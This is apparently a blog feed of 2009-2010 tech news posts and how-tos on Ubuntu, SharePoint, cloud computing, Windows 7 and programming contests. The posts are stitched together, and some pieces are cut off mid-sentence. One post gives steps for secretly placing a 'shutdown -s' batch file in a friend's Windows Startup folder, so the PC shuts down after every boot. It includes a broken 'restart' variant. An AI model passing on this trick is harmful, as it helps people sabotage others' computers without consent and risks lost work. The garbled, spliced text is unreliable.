Ubuntu in action with new version 10.10 Maverick Meerkat :)
Some of the features are
1) For the 10.10 desktop edition, the GNOME desktop environment has been updated to the 2.31 version and the Evolution groupware suite is version 2.30, which is said the be much faster compared with the version the previous release, 10.04.

2)The Ubuntu Software Center gets an updated look and feel and the Ubuntu One cloud service is better integrated in the to the desktop integration with a new authentication process.

Microsoft’s latest suite of business products mark the start of a dramatic shift towards more informal user interfaces.The newly released Microsoft Sharepoint 2010 has integrated a number of interesting new functions such as Instant Messaging (IM), voice over IP (voIP) and live content streaming.The Facebook-esque new MySite feature is especially reminiscent of social networking.The web-based feature allows users to share their profile with other users within the network, automatically taking information from content that that user creates to make tag clouds of commonly-used keywords.In a turnaround from Microsoft's usual exclusive web browser policies, MySite will be viewable through various browsers, including Firefox and Opera and can be further connected to display status updates from traditional social networking sites such as Facebook, MySpace and LinkedIn.Microsoft Australia spokesperson, Oscar Trimboli, said that the reason behind the shift was the increase of “digital natives", people who grew up with computers, in the workforce, creating a demand for document in an enterprise to be as readily available as information on the internet.Indeed, Corrs Chambers Westgarth chief information officer and Microsoft customer, Jon Kenton, said that he was quite excited about using the software's social collaboration aspects to keep tabs on aspects of human resources.However, the shift towards the use of social networking tools within an enterprise environment, raises issues as to how much an employee's privacy can be violated with an organisation's use of these new features.Although Microsoft does provide a few basic tools for the filtering of content from and to these sites, Trimboli said that the issue of protection of privacy was ultimately up to the end user and the organisation."The user ultimately controls with their own login to their own social network what information they expose to the organisation or to their other contacts and that's really reliant on the controls within that social network itself." Recovering ubuntu 9.10 and XP after formatting

Hi folks everyone facing this problem like
If you are using dual OS say XP and ubuntu 9.10 then if you have an idea of formatting XP just format it and install newly then you can't see Frub2 list to select OS just tit automatically boots to XP.It means you lost your ubuntu 9.10 MBR so to recover ubuntu just follow these steps.Even i got the same problem.After googling i got the solution but not in clearly organized way so i am here explainin you to get over from problem.

1) insert your ubuntu 9.10(Karmic) Live CD

2)open Application->Accesories->Terminal

3) sudo fdisk -l
It list all your partitions note down you linux partition
In my system its at /dev/sda5
4)

sudo grub-install --root-directory=/media/sda5 /dev/sda

5)Now u recovered your ubuntu 9.10 type Exit and restart

6)It Lists both ubuntu and XP,Just Select XP
It throws some error like device not found or anything

7) No need to suffer boot to ubuntu and open Application->Accessories->Terminal
sudo update - grub

8)Now you recovered both XP and ubuntu9.10 MBR.

9)So enjoy with dual OS

Watson lab in New York, as the new director of HP Labs China.HP closed a Tokyo lab last year. Banerjee rejiggered HP Labs'sperformance evaluation system to more accurately measure high-qualityresearch. The company also shortened the amount of time it takes topresent findings to a review board. "Gone are the days of the labs of30 years ago, where there was no pressure and you did whatever youwanted to do," says Banerjee, sitting at a table overlooking a leafycourtyard below his office, which is down the hall from the preservedwork spaces of HP founders William Hewlett and David Packard.
Hewlett-Packardoperates one of the few remaining university-style research labs inU.S. industry, along with IBM and Microsoft (MSFT). The labs are designed to foster innovation by looking five and 10 years into the future. But industrial labs have also been criticized for failing to commercialize enough of their work.
In May 2008, Banerjee, a former academic and founder of two chip design companies, undertook a top-to-bottom reorganizationof HP Labs aimed at turning more of its research into usefultechnology. "This was a five-year plan I signed up for with [ChiefExecutive] Mark Hurd,"Banerjee says. Microsoft has officially launched its Surface line of touch computer units in Australia with a focus on retail, education and finance markets.

At an event in Microsoft’s Sydney headquarters on Tuesday, Microsoft’s entertainment and devices division president, Robbie Bach, said the main targets would be businesses and not consumers.

“The goal here is to make the technology so natural that you don’t even notice it,” he said. “Today, surface is mostly provided by businesses. Microsoft is reminding people running the Microsoft Windows 7 Release Candidate (RC) to install the released version of Windows 7 to avoid data loss.

The ‘beta’ version of Windows 7, Windows 7 RC, is due to expire on 1 March 2010. Once the deadline is reached, the PC will experience bi-hourly shutdowns.

The shutdowns continue for three months through to 1 June 2010, when the PC’s wallpaper will disappear and a message: “This copy of Windows is not genuine” will display in the lower right corner above the taskbar.

Data will not be saved during the shutdowns and Microsoft is pushing users to install Windows 7 before the automatic shutdowns begin.

People communicate differently today, people transact and pay their bills differently today, and that drives today's criminals," ABC Science quoted David Marcus, director of security research and communications for McAfee Labs, which this week released its 2010 Threat Predictions report, as saying.
According to McAfee, Facebook, Twitter and other social networking sites-will become major targets for cyber criminals.
Symantec said in its recent report on 2010 threats, URL shortening services will "become the phisher's best friend."
Some criminals have already learned how to bypass the banks' second layer of protection.

Hi friends this year we threee went to kerala "Amrita University" for acm ICPC(International Collegiate Programming Contest) Team Name as "Teck Monks" which held on nov 1st...This year they asked 9 problems...It was more ambiguity...

Team "Oasis" from South Korea's Sogang University took first place at the Amritapuri regional contest, held Nov. 1 at Amrita Vishwa Vidyapeetham University.

"Oasis" solved seven problems correctly, the only team to do so. "CounterGambit," from India's National Institute of Technology, Trichy, took second place, mirroring their finish in the Gwalior/Kanpur regional contest a month before; they solved six problems correctly. "Phoenix," from the DJ Sanghvi College of Engineering in Mumbai, came in third.

Four teams from the Indian Institute of Technology representing schools in Guwahati, Bombay, Roorkee and Chennai placed in the top 10. Fifty-six teams from five countries participated in the contest, which was directed by Professor Vallath Nandakumar.

Professor Nandakumar noted in his report that the organizers took contest participants on a sightseeing tour of the Kerala countryside, visiting the area beaches and the Palaruvi waterfalls and capping the trip off with a banquet dinner and an show of cultural dances.

1.open note pad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension

4.explaination,u have created a prog which shutdowns the pc with in 30
of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory

NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"

Google Works on a Different Web

The Google search engine has inspired a new algorithm that can predict which species losses will spark the fastest implosion of a food web, according to the University of Chicago's Stefano Allesina. "The problem of how ecosystems are likely to respond to the loss of species is quite important, particularly in light of how many different ways human activities are resulting in the local extinctions of populations," says the Santa Fe Institute's Jennifer Dunne. The algorithm's functionality is similar to Google's Web-page-ranking tool, PageRank. PageRank quantifies a page's value to searchers depending on the importance of the pages that link to it. However, the Google ranking system assumes that any page might lead to any other page--a concept that is not applicable to food webs. Allesina and Mercedes Pascual of the University of Michigan in Ann Arbor only drew connections between predator and prey. The researchers compared the new algorithm to others by using information from real-world food webs. The algorithm matched results of the standard-bearing genetic algorithm without being computationally intensive.

Wolfram's Search Goal: Compute All

Stephen Wolfram has set the ambitious goal of converting the global corpus of knowledge into a computable format through WolframAlpha.com, a computational knowledge engine rather than a search engine. WolframAlpha.com computes data and frequently renders query results into lists, charts, and graphs. "You get to ask WolframAlpha specific questions and it provides specific answers, rather than asking about some general topic and expecting it will do what search engines do, giving you a bunch of links about that topic," Wolfram says. He estimates that WolframAlpha can currently answer users' questions with more than 75 percent accuracy, and the system's linguistic comprehension capabilities are steadily improving. Wolfram says the long-term goal for WolframAlpha is to make as much globally accumulated knowledge computable as possible. One avenue being explored is the ability to upload one's own data to WolframAlpha and have it perform analysis on that data. "Another direction we are just starting to play with ... is being able to invent on the fly," Wolfram says.

Ubuntu founder names 10.04 release

Lucid Lynx to help enterprises move into the cloud

The wraps are coming off the latest version of Ubuntu with creator, Mark Shuttleworth, announcing the name of the next release, Lucid Lynx.

Speaking via video to UbuCon in Atlanta, Shuttleworth said Ubuntu 10.04, which will the supersede 9.04 release, would be a long-term support (LTS) release with support for the desktop for 3 years and for the server for 5 years.

"It has been a very big year in the Ubuntu community and probably the biggest thing for us is the focus that is now starting to come to bear on our next release", he said. "It will effectively be the third LTS release in a row delivered on a two-year cadence."

Shuttleworth said it was testament to the open source community that the Ubuntu project was not only able to release the product on on a six-month cadence, but on a two-year major platform cycle for large organisations that need long term support and predictability for organisational planning.

Lucid Lynx will continue the close relationship with the Debian architecture and infrastructure, he said.

"We have had the opportunity to do some good behind the scenes support with Debian, which is the most important distribution to us. I hope over time that we can broaden that and elevate the art of free software."

The Lucid Lynx name is designed to bring together the aspirational characteristics of Ubuntu – Lucid for clarity and focus, and Lynx as a "thoughtful and considered predator".

On the desktop side, 10.04 will focus on delivering the best of GNOME 2.0. Subsequent releases will focus on the new technologies, architectures and experiences being developed as part of GNOME 3.0.

"On the server side, we’ll be taking the large scale, horizontal scalability, volume deployment, heritage of Debian and really try to push that into cloud computing," Shuttleworth said. "Making sure that 10.04 is a platform for anybody who is building a large scale infrastructure - for anybody who is trying to build the next Facebook, the next Google, the next eBay. Whether you want to start on (Amazon) EC2 and migrate to the managed cloud, Ubuntu 10.0.4 is going to be the platform."

Groovy project manager Guillaume Laforge says the Groovy programming language was designed to make life simpler for developers through its seamless integration with the underlying Java platform. "There's really no impedance mismatch between Groovy and Java," he says. "That's why lots of projects integrate Groovy, or why companies adopt the [Groovy on Rails (Grails)] Web framework." Laforge says that Groovy finds frequent use as a superglue for tying together various application elements, and he points out that Groovy is often the preferred language when developers must integrate and employ an additional language in their applications. Laforge says that Grails offers an advanced integration of the best-of-breed open source software components to provide a pleasant experience for developers while also addressing various other aspects such as the project build, the persistence, a rich view layer, and an extensible plug-in system. Laforge says Groovy's support for closures is his favorite feature. "With closures, you can start thinking differently about how you solve your everyday problems, or create complex algorithms," he says. "Closures give you an additional layer of abstraction for encapsulating code and behavior, and even data [thanks to Groovy builders]. Also, with various helper methods added to Java collections, in combination with closures, you've got the power of functional languages at your disposal."

White House Unveils Cloud Computing Initiative

The Obama administration has introduced a cloud computing policy that aims to lower infrastructure costs and reduce the environmental impact of government computing. Federal CIO Vivek Kundra says the plan is the administration's first formal effort to launch a broad system designed to leverage existing infrastructure and cut federal spending on information technology, particularly expensive data centers. Kundra says the government has built numerous, redundant data centers, which has resulted in a doubling of federal energy consumption between 2000 and 2006. Some aspects of the cloud computing policy already have been released, such as the new Apps.gov Web site, which is a clearinghouse of business, social media, productivity applications, and cloud IT services. The administration hopes the site will become a one-stop shop for many services that previously required extensive IT spending. The second phase will involve budget reform. For fiscal year 2010, the administration will be pushing cloud computing projects in the hope that many lightweight workflows can be moved into the cloud, and in fiscal 2011 the administration will be issuing guidance to agencies. The final phase will include policy planning and architecture that will involve centralized certifications, target architecture, and security, privacy, and procurement concerns. Kundra says the ultimate goal is to make it easy for agencies to procure the applications they need and to avoid having the government pay to build infrastructure that may be available for free.

New Way to Attack the Cloud

Researchers at the University of California, San Diego (UCSD) and the Massachusetts Institute of Technology (MIT) have found security holes in Amazon's EC2 cloud-computing service. The researchers were able to execute basic versions of side-channel attacks, in which a hacker looks at indirect information related to the computer to determine what is taking place on the machine. The researchers succeeded in pinpointing the physical servers used by programs running on the EC2 cloud, and then extracted small amounts of data from those programs. Previous research has demonstrated the vulnerability of side-channel attacks. In 2001, University of California, Berkeley researchers were able to extract password information from an encrypted SSH data stream by performing a statistical analysis of how keystrokes generated traffic on the network. By looking at the computer's memory cache, the UCSD and MIT researchers were able to obtain basic information about when other users on the same machine were using a keyboard to perform tasks such as accessing the computer using an SSH terminal. The researchers say that measuring the time between keystrokes enables them to determine what is being typed on the machine. To perform this attack, the researchers had to determine which EC2 machine was running the program they wanted to target, a difficult challenge as cloud computing is supposed to hide this information. However, by performing an analysis of DNS traffic and using a network-monitoring tool, the researchers developed a technique that could provide a 40 percent chance of placing their attack code on the same server as their target. Security experts say that side-channel techniques could lead to more serious problems for cloud computing.

You can use it when you want to know a car model, an insect name, what kind of food is served at a restaurant and how much, who built a bridge, etc. With detail informations like that, this gadget might only be used by secret service agents. Very futuristic concept.

Red Hat, IBM, Novell Major Contributors to Exploding Linux Kernel Development

The Linux Foundation reports that 2.7 million lines of code have been added to the Linux kernel over the past 16 months. The open source project now has more than 11.5 million lines of code. The number of lines added, removed, and changed each day has increased 70 percent, 68 percent, and 32 percent, respectively, from the previous report in April 2008. And the number of developers contributing to each kernel release cycle, which comes every two to three months, has risen about 10 percent. More than 5,000 individual developers from nearly 500 companies have contributed to the kernel, and the greatest support continues to come from Red Hat, IBM, and Novell. Participation from the individual development community has doubled over the past three years. The increasing rate of change and jump in contributors is a sign of a "vibrant and active community, constantly causing the evolution of the kernel in response to a number of different environments it is used in," the report says. The foundation also suggests the pace of development will continue to accelerate

Wi-Fi via White Spaces

The transition from analog to digital broadcasts has opened up radio spectrum that could be used to deliver long-range, low-cost wireless Internet service using white spaces, which are empty fragments of the spectrum scattered between used frequencies. White space frequencies could be used to provide broadband Internet access in rural areas and fill in gaps in city Wi-Fi networks. For example, Microsoft Research's Ranveer Chandra says white space frequencies could be used to allow people to connect to their home network from up to a mile away. Last November, the Federal Communications Commission (FCC) ruled that companies could build devices that transmit over white spaces, but also required that those devices should not interfere with existing broadcasts. Microsoft researchers have designed a series of protocols, called White Fi, to account for the restrictions involved in using white spaces. Chandra says wireless networking has traditionally used an open spectrum with all users being equal shareholders, but in white spaces some users are primary users. Chandra says his research team recently received an experimental license from the FCC allowing them to build a prototype White Fi system on the Microsoft Research campus. The researchers will send their findings to the FCC in the hope that the data will help establish future white-space regulations. The blueprints for a computer network that uses white spaces were presented at ACM's SIGCOMM 2009 conference, which takes place August 17-21 in Barcelona, Spain.

In a paper that will be presented at ACM SIGCOMM 2009, which takes place Aug. 17-21 in Barcelona, Spain, Microsoft researchers will demonstrate HostTracker, software that removes the anonymity from malicious Internet activity. The researchers were able to identify the machines responsible for anonymous attacks, even when the host's IP address rapidly changed. The researchers say HostTracker could lead to better defenses against online attacks and spam campaigns. For example, security firms could create a clearer picture of which Internet hosts should be blocked from sending traffic to their clients, and cybercriminals would have a more difficult time disguising their activities as legitimate communications. The researchers analyzed a month's worth of data collected from a large email service provider to attempt to determine users responsible for sending spam. Tracking the origins of a message involved reconstructing relationships between account IDs and the hosts used to connect to the email service. The researchers grouped all the IDs accessed from different hosts over a certain time period, and the HostTracker software searched through this data to resolve any conflicts. The researchers also developed a way to automatically blacklist traffic from an IP address if HostTracker determines that the host at that address has been compromised. HostTracker was able to block malicious traffic with an error rate of 5 percent, and using additional information to identify good-user behavior reduced the error rate to less than 1 percent.

Replace Windows Live Messenger with Emesene

Tired of Windows Live Messenger bloat and wishing that there was a simpler and cleaner replacement that would let you use your live.com and hotmail.com accounts? Look no further, now you can have all that messenger goodness with Emesene!

Installation & Initial Startup

The nice thing about Emesene is that it is an open source messenger that works on Windows and Linux (cross-platform is always a good thing!).

One point of interest during the install is that Emesene states that it will require 51.4 MB of disk space…but this messenger is more than worth it!

Once you have finished the installation process and started Emesene for the first time, you will see the initial login window. To login you will need to enter your full live.com or hotmail.com address (i.e. user-name@live.com). You can select to have Emesene "Remember me", "Remember password", and "Auto-Login". As with other messengers, you may also select your Status before fully logging in.

Pre & Post Login Menus

Here is a quick look at the pre-login menus…not too much that you can access at the moment.

Once you do get logged in though, you will have access to the following menus.

Plugins Manager

You may access the Plugins Manager through the Options Menu. To add plugins, select the ones that you are interested in and then click "Load New Plugins". Notice that a brief description is provided for each plugin selected directly beneath the selection area (very nice!).

Preferences

The Preferences Window has three tabs to choose from. Here you can see the first one for General Preferences. You can make adjustments for File Transfers, Desktop Settings, and Connection Settings. Notice that one of the Desktop Settings will require a restart if selected.

In the Appearance Tab you can make adjustments for Icon Size, Themes, Smiles, Text Formatting & Layout in Conversations, and Color Schemes. If you need to, you also have the option to "Revert" to the original default setup (wonderful!).

In the Interface Tab, you can make adjustments regarding Tabs in the Conversation Windows, Displaying of Avatars, and the areas that will display in the Main & Conversation Windows. To make changes in the Main & Conversation Windows, click on any of the "Blue Areas"…this performs the same action as "Select" and "Deselect". This makes it extremely easy to adjust the layout and display for Emesene's Windows!

Ready To Go

Here you can see Emesene open and ready to go. Notice that in the upper right corner there is a small mail counter. This does a wonderful job of displaying the amount of new e-mails that you have and quickly adjusts to reflect any changes in that number (i.e. you have read some or all of them).

There is a very nice Right Click Menu available as well.

The Message Window has a very nice layout with a Formatting Icon Bar available. Notice that you may also add new people to the conversation (Blue Plus Sign) and control file transfers (Green Arrow Symbol) from here as well.

Conclusion

If you are looking for a very nice, uncomplicated, and "lite on system resources" replacement for Windows Live Messenger, then Emesene is definitely worth taking a close look at.

How to Upgrade the Windows 7 RC to RTM (Final Release)

The final version of Windows 7 was released yesterday for MS Technet subscribers, but you can’t upgrade directly from a pre-release version—at least, not without a quick and easy workaround, and we’ve got you covered.

The Problem

Windows 7 checks whether or not the current version you are running is a pre-release copy, and prevents you from upgrading further. For reference purposes, this is the error you’ll see when you try and upgrade.

The Solution

The solution is to edit a file inside the Windows 7 DVD—which you’ll have to extract to the hard drive to proceed.

If you are using an ISO image for the installation progress, you can use the awesome 7-Zip utility to extract the ISO to a folder on the drive.
If you are using an actual DVD, you can simply copy all of the files from the DVD to a folder on your hard drive.

Once you’ve extract the files, browse down into the “sources” folder to find the cversion.ini file.

Once you’ve opened up the cversion.ini file, you’ll notice that the MinClient line has a value of 7233.0, and since the Windows 7 RC release is build 7100, you can understand why it’s not working.

All you need to do is change the MinClient value to something less than the current build you are using. For the RC release, you can change it to 7000.

Now you can simply launch the setup.exe file from within the folder, and do the upgrade directly from the hard drive. Once you’ve started the setup, click Install now.

Once you get to the type of installation screen, choose to Upgrade the existing install.

Once you reach the Compatibility Report screen (if it doesn’t show up at all, be happy about it), you’ll see the list of applications that probably won’t work once you upgrade. Realistically most of these apps will work just fine, but the important thing is that you’ll be able to upgrade.

Note: You could always smooth the upgrade process by removing any apps that have compatibility problems, before you do the upgrade.

At this point, the upgrade should start working, and will take a rather long time.

Important Notes

There are a few important things to keep in mind when you are upgrading to the final version:

The Windows 7 beta or RC releases were Ultimate edition, so you’ll only be able to upgrade to the RTM (final) if you are installing Ultimate Edition.
Whenever possible, you should really backup your files and do a clean install. There are less headaches this way, and you get the benefit of a nice clean profile.

Steps to host appliaction in cloud

To host application in cloud computing
you upload your application to Azure using the Azure portal at:
https://lx.azure.microsoft.com/Cloud/Provisioning/Default.aspx

If you're wanting to put a SQL database back end in the cloud, you'll want to check out SQL Data Services. If you want to access your on premise SQL Server from the cloud you'd have to punch in the appropriate holes into your firewall to allow access (not something I think any DBA or network admin would be fond of doing).

Cloud computing can be broken down into 3 basic categories.
SaaS - software as a service (using a hosted product such as SalesForce.com or CRM Online)
PaaS - creating an application that is then deployed into a hosted environment (Windows Azure)
IaaS - a virtualized infrastructure hosted in the cloud (EC2 and to an extent Windows Azure)
When hosting an application in Azure, it needs to be built for Windows Azure. You can't simply build it as you would a traditional on-premise application and push it up to the cloud. This doesn't prevent you from pushing custom bits into Azure as you did with an on-premise but it does limit what can be pushed. In a nutshell, it seems that if you have to run an install to get require software on the computer, you won't be able to run it on Azure. However, if you just need to load some redistributables onto the box and they can reside in the application folder, that shouldn't prohibit it running.

Course as you'd expect, there are security limitations in place to help ensure that anything that gets loaded into your deployment don't compromise the Azure Fabric and possibly damage other applications running in the Windows Azure cloud.

Does this whole cloud computing craze make your mental gears turn? Chances are, unless you are a big company with some good friends that would love to let you demo this new way of computing, you probably don't have the money to drop on getting a cloud system up and running. And if you're a home user, cloud computing is overkill for you.

You're not out of luck, however, if you still want to try this. There is a cloud PC that you can use without the need for a server; it's called CherryPal. It comes with a small plastic box with two USB ports, VGA-out, audio out, LAN and wireless. It has 4 GB flash memory, so you can store stuff locally as well as on the server. Along with this PC, you get 50 GB online storage for your hard drive. It sounds like a pretty good deal at $250. It will run a distribution of Linux with applications bundled with it such as OpenOffice. For all those environmentally conscious users, this computer consumes a total of 2 watts.

Disadvantage of Cloud Computing

Cloud computing disadvantages:

First I'll break the bad news about cloud computing, and then give you all the benefits of it. One of its few major issues is that it relies totally on network connections. If the network goes down, you're done using the computer until it is back up. If the network gets bogged down, then your computing will be slower.

The other major downfall is that it doesn't use a hard drive. While it is a benefit as I will discuss later, it is also a negative. Some applications or hardware might require having a hard drive attached to the computer; these might be hard to get working properly with the hard drive on a remote server.

From my experience, the last big issue is peripherals. Getting printers to work is hit or miss. The more popular printers will give you little trouble when you try to get them working properly. The little printers that aren't as common, such as label printers, can face issues with the mini PC that each user has.

In most big businesses, few people have personal printers; most printers are networked, so it's not a big issue to a majority of users. Things such as scanners use software to work with the PC, however, and if your virtual hard drive doesn't have the software, when you log onto the cloud computer at a desk, you won't be able to use the scanner until you install the software.

User Management – not so easy, if you stick with the Amazon Web Services console, you are simply down to one person logging into the system. Using shared credentials is a big no no when it comes to providing security and accountability with your project. I did not find a software or product that would allow me to make multiple administrator accounts that would work for me. There are software programs that exist, but I found most of them lacking what I was looking for leaving me with the AWS console and access to the computer being shared by multiple people and one login. If anyone has a great tool that will provide the ability to audit, report, and provide multiple account support for multiple AWS images, then I would love to hear about it.

Updates – if you want to make sure your system is updated, then I would highly suggest you make your own AMI on a fully supported operating system (regardless of flavor). One of my biggest issues was finding out that YUM on Fedora would not update on the Amazon AMI, and kept on coming up with out of mirror errors. Fedora needs to step up to the plate and provide a fully functioning mirror, or better yet you should make your own AMI for AWS that provides the support you need for what you are trying to do. There is nothing more dangerous on the internet than an Operating System that cannot be patched or software that cannot be updated. If you are using a Windows AMI, make sure that everything is installed or that you have an I386 directory, there is nothing more amusing than being prompted to provide the installation disk when your OS is in the clouds.

Socialization of the product – Cloud computing is scary for many people, because it puts everything you have in someone else’s data center. For some the concept must be killed now, for others they see it as a way to save money. Regardless of what your approach is, you have to make sure you have full executive support and buy in for what you are doing; otherwise your project will languish for weeks if not months waiting for people to grab onto the concept. You should be prepared to deal with fear, FUD, and other undesirable business ways of killing off the cloud computing project.

Failure is going to happen – make sure you snap shot your Cloud Computing system before you start tinkering with it. While backups are always a good idea, it is also an excellent idea to simply snapshot what you are doing before you make huge changes to the system. This is often easier than trying to back out a pile of changes and you have no idea which change broke what.

Never ever hit “Terminate Instance” – if you hit terminate instance, it is gone, gone for good, and you cannot get it back, pray you made a snapshot before you “turn the computer off” for the night. Otherwise you get to start from scratch on the whole thing. This will cause amusing chuckles from your co-workers, and bemused responses from your Project Manager. It might also set you back unless you made a snapshot.

Logging – make sure you have a nice way of getting logs back to the company, or that you are going to be able to process logs on the cloud computers. You will want this for compliance, and to know if someone is doing something unusual with your system. Syslog over the internet is not a great way to get logs off the cloud back to the company. You want to use a VPN to make this happen, and it is easy to set up regardless of chosen operating system.

Documentation – you want to make your own documentation on the project you are working on, do not rely on AWS documentation to help you, often the AWS documentation is difficult to follow, understand, or read. The approach to documentation is make your own, and do it in such a way that anyone can follow what you did, how you did it, and what they need to duplicate your processes. Like any good system design or development, cloud computing systems should be documented just like any other internal project.

Make sure you have a good ROI – make sure that if you go into the cloud that there are obvious measurable cost savings in the offering. Some setups make no sense economically, while for some companies they do. Make sure you do not overspend on your project.

Do not underestimate the amount of time required – one of the biggest shortfalls of the project was incorrectly allocating time, or grossly under estimating the amount of time it would take to complete the project. In most projects I am usually dead on with time estimates, and found that I was under estimating time to completion for a first cloud computing project by upwards of 4X. If I thought it would take 30 minutes, it often took 2 hours to complete a task. Most of this is attributable to new technology, new ways of doing things, and general training ramp up time. While not a barrier to use, it was a barrier to completing the project on time.

URL’s and IP Addresses – AWS will give you a temp URL to work with when you are prototyping your system, if you use that then assign an IP address later, then a Domain Name after that, and you did not program the base URL as a configurable item, then you will have to go back and change that. The temp URL with AWS does not work after you assign an IP address. It might be easier to have already set up and IP address and DNS entry before you let the developers at the system.

Open Source Software is the best way to go here – mostly because you do not have access to a DVD drive on the cloud, and software that wants a DVD to verify you own it, or needs a DVD to load is an oxymoron in the cloud. Otherwise, make your own AMI, and make sure that what you are building is able to work without a DVD drive, or disks, or other items we take for granted in the data center where we can touch physical items.

Those are the big key issues and some interesting differences between being in the data center and working through the cloud. These are my own experiences working with Amazon Web Services over the last 60 days. Overall though I would say that the experience with AWS has been positive, but given the ramp up time, learning curve, and support issues, this project actually lasted longer by 75% than it was initially estimated to last. Most of that is again, attributable to learning curve, the promise of cloud computing for rapidly deploying a system should hold true for any other deployments that we will do in the cloud. But for the first big project, make sure you either already have trained folks in Cloud Computing, or that your project can go over time without detriment.

Make sure you are ready to be audited as well, that includes log management, user accounts, and patching/updating. While I highly recommend you make your own tested AMI, some people will not do that and whatever AMI exists already for the project they are doing. You will want to make a careful risk evaluation of that stance depending on what you are using your cloud computing system for. If you fall under SOX, HIPAA, or anything else, you want to make sure you stay in compliance.

Yale Researchers Create Database-Hadoop Hybrid

Yale University professor Daniel J. Abadi has led the development of HadoopDB, an open source parallel database management system (DBMS) that combines the data-processing capabilities of a relational database with the scalability of new technologies such as Hadoop and MapReduce. HadoopDB was developed using components from PostgreSQL, the Apache Hadoop data-sorting technology, and Hive, the international Hadoop project launched by Facebook. HadoopDB queries can be submitted as either MapReduce or in SQL language. Abadi says data processing is partially done in Hadoop and partially in "different PostgreSQL instances" spread out over several nodes in a shared-nothing cluster of machines. He says that unlike previously developed DBMS projects, HadoopDB is not a hybrid only at the language/interface level, but also at the systems implementation level. Abadi says HadoopDB combines the best of both approaches to achieve the fault tolerance of massively parallel data infrastructures, such as MapReduce, in which a single server failure has little effect on the overall grid, and is capable of performing complex analyses almost as quickly as existing commercial parallel databases. He says that as databases continue to grow, systems such as HadoopDB will "scale much better than parallel databases."

The United States must capitalize on emerging opportunities in order to regain the top spot in innovation, federal chief technology officer Aneesh Chopra said in a keynote address to the recent Open Government and Innovations Conference in Washington, D.C. The Obama administration is investing in technology such as healthcare information technology and the smart grid, and these investments offer the United States an opportunity to take the lead in these areas, he said. "Driving game-changing innovation" will be a focus of Chopra, who added that open data standards, research and development investment, and preparing the workforce for jobs of the future will help spur innovation. Chopra cited a report from the Information Technology and Innovation Foundation that ranks the United States last among 36 countries on technology metrics such broadband activity, research and development tax credits, and immigration policy. "We have failed to translate the power and potential in our nation's capacity to compete in a more globally competitive marketplace," he said.

NICTA opens its software to the world

The National ICT Australia (NICTA) research organization has launched the OpenNICTA portal, which will allow people to view and download software developed and licensed by NICTA. OpenNICTA will serve a major role in the organization's effort to gain international attention and collaboration, says NICTA's Gernot Heiser. "Open source software is impossible to ignore and it is an important way for people to collaborate," Heiser says. OpenNICTA will offer access to 11 NICTA-developed open source releases initially, with the total number rapidly expanding during the next year. Heiser says he would like to see other research organizations follow NICTA's lead and formalize processes for releasing software to the open source community. He says research organizations have been releasing software back to the open source community for years, but the releases are generally done in an ad-hoc fashion and below the radar of authorities and the public. NICTA now has a formal process of determining if a project should be released as open source. "This procedure is something we can improve on," Heiser says. "At the moment, our hurdles are still on the high side, but it is natural that people are cautious initially."

Opera Wants To Make Your Computer Part Of The Cloud

Opera has recently announced a new software/service offering called Opera Unite. This is included in a beta version of the Opera 10 browser that you can download directly from the company's website. With Unite Opera plans to help you bring a piece of the cloud home with you, by allowing you to simple and almost effortlessly host content for public consumption, within your own computer.

Opera Unite will work as a platform, allowing new services to be added to the browser and thus adding new functionality for the end user. What interest this platform will stir up amongst developers is still too soon to tell.

While the concept is rather interesting whether or not the implementation will prove to be useful, or even usable, also remains to be seen. The main drawback to proposed approach is that while more and more people have permanent broadband connections to the Internet, even more people have notebook computers which they carry around all the time and which are thus unavailable to serve content on-line. This can, however, prove to be a powerful tool for people working in small distributed groups or that are part of tight communities such as college students.

My first contact with Unite has me interested but not yet overly optimistic about its usability. I will continue to follow the product's development, and even more importantly to follow what new services are added to this platform Opera is introducing.

5 Cool Cloud Computing Research Projects

The HotCloud conference on cloud computing in San Diego will showcase a number of research projects. One such project is a Trusted Cloud Computing Platform developed by researchers at the Max Planck Institute for Software Systems that "enables Infrastructure as a Service (IaaS) providers such as Amazon EC2 to provide a closed box execution environment that guarantees confidential execution of guest virtual machines (VMs)." The platform would guarantee customers that their data has not been interfered with by service providers while also allowing service providers to secure data even across many VMs. Meanwhile, University of Washington researchers are exploiting the fact that Web services and applications will be very closely situated to develop CloudViews, a common storage system designed "to facilitate collaboration through protected inter-service data sharing." University of Minnesota researchers have outlined a way to form nebulas from distributed voluntary resources that could provide greater scalability, more geographical dispersion of nodes, and lower cost than traditional managed clouds. Researchers at the University of California Santa Cruz, NetApp, and Pergamum Systems are considering the trade-offs between storing data and recalculating results as needed in an attempt to boost the efficiency of cloud computing. They write in a paper that "recomputation as a replacement for storage fits well into the holistic model of computing described by the cloud architecture. With its dynamically scalable and virtualized architecture, cloud computing aims to abstract away the details of underlying infrastructure. In both public and private clouds, the user is encouraged to think in terms of services, not structure."

NASA: Robots Critical to Endeavour's Mission on Space Station

The U.S. space shuttle's current mission, one of the most technical ever attempted by NASA, would not be possible without the use of robotics, says Holly Ridings, the lead space station flight director for the Endeavour mission. "We have learned a lot about robotics and about working together with a robot," Ridings says. "Robotics is really one of the things that NASA has a lot of experience in and it's allowing us to do some wonderful things on the space station." After docking with the space station on the morning of June 15th, the Endeavour crew will take the mission's first spacewalk, assisted by two robotic arms. Ridings says that while the astronauts work outside the space station, a robotic arm will lift a 4-ton piece of the Japanese complex out of the shuttle's payload bay. The piece, which will be attached to the outside of the Japanese module, is designed to hold its own payloads and host experiments that need to be conducted in outer space. In addition to the station's two main robotic arms, which will hand off the new piece between them several times during the mission, a third robotic arm, attached to the Japanese module, will be used for the first time in about a week. The third arm, installed in June 2008, will pick up and move payloads to the new piece. The robotic arm's software features several redundancies and five to seven things would have to go wrong for the arm to let go of the space station and drift away, Ridings says.

New Coalition Pushes for 'Big' Broadband

